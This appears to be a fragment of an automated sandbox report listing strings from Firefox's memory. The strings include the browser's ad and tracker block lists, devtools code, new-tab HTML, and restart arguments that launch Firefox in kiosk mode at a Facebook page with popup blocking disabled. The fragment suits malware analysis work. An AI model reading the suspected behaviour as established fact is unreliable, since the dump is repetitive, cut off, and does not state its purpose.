Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: _addSuggestedIndexResults_updateFlexData/flexDataArray<incrementModificationCountsetSpellcheckUserOverrideremoveDocumentStateListenereEditorEnableWrapHackMask_addSuggestedIndexResults/<fractionalDataArray is empty!isSafeToPlayDeferredEventDOM_VK_WIN_OEM_FJ_TOUROKUDOM_VK_OPEN_CURLY_BRACKETcanIncrementMinKeywordLengthurlbarView-title-separatorexperimental.hideHeuristicmaxHistoricalSearchSuggestionsWEATHER_PROVIDER_DISPLAY_NAMEstrippedUrlToTopPrefixAndTitle#recordEngagementTelemetrysuggestedIndexResultsByGroupcontextual.services.quicksuggestisURLEquivalentToResultURLfirefox-suggest-urlbar-block_checkAndSetExposurePropertiesMust provide a boolean argumentincrementMinKeywordLengthDOM_KEY_LOCATION_STANDARDfirefox-suggest-weather-titleDOM_VK_WIN_OEM_FJ_MASSHOUfirefox-suggest-weather-high-lowDismissing weather resultDOM_VK_CLOSE_CURLY_BRACKETremoveAttributeOrEquivalenteNewlinesReplaceWithSpaces.panel-header > h1 > span_createNoSyncedTabsElementtoolkit/branding/accounts.ftlappMenu-header-descriptionPanelUI-fxa-remotetabs-tabslistrecordSyncedTabsTelemetrysendTabConfiguredAndLoadingensureUnloadHandlerRegisteredget _arrowNavigableWalkerMIN_STATUS_ANIMATION_DURATIONidentity.fxaccounts.enabled_createShowMoreSyncedTabsElementappmenu-fxa-sync-and-save-data2ensureUnloadHandlerRegistered/<_transitionViews/viewRect<https://www.facebook.com/videogWindowsWithUnloadHandleropenPopup/openPopupPromise<EnsureFxAccountsWebChannel equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: am Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:? equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: browser.fixup.domainsuffixwhitelist.Failed to listen. Listener already attached.@mozilla.org/network/protocol;1?name=default{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}^[a-z0-9-]+(\.[a-z0-9-]+):[0-9]{1,5}([/?#]\|$)devtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderresource://devtools/shared/security/socket.jsUnable to start devtools server on WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=filebrowser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAG_FORCE_ALTERNATE_URIdevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.js^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?DevTools telemetry entry point failed: devtools.debugger.remote-websocketdevtools.performance.recording.ui-base-urlFailed to listen. Callback argument missing.No callback set for this channel.^([a-z+.-]+:\/{0,3})*([^\/@]+@).+devtools.performance.popup.feature-flag@mozilla.org/dom/slow-script-debug;1@mozilla.org/uriloader/handler-service;1get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIJSON Viewer's onSave failed in startPersistenceresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjshttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1_injectDefaultProtocolHandlersIfNeededisDownloadsImprovementsAlreadyMigrated@mozilla.org/network/async-stream-copier;1https://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://mail.yahoo.co.jp/compose/?To=%sScheme should be either http or httpsresource://gre/modules/JSONFile.sys.mjsgecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs_finalizeInternal/this._finalizePromise<https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sextractScheme/fixupChangedProtocol<{33d75835-722f-42c0-89cc-44f328e56a86}http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjsMust have a source and a callback@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst argument should be an nsIInputStreamhttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALID
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" 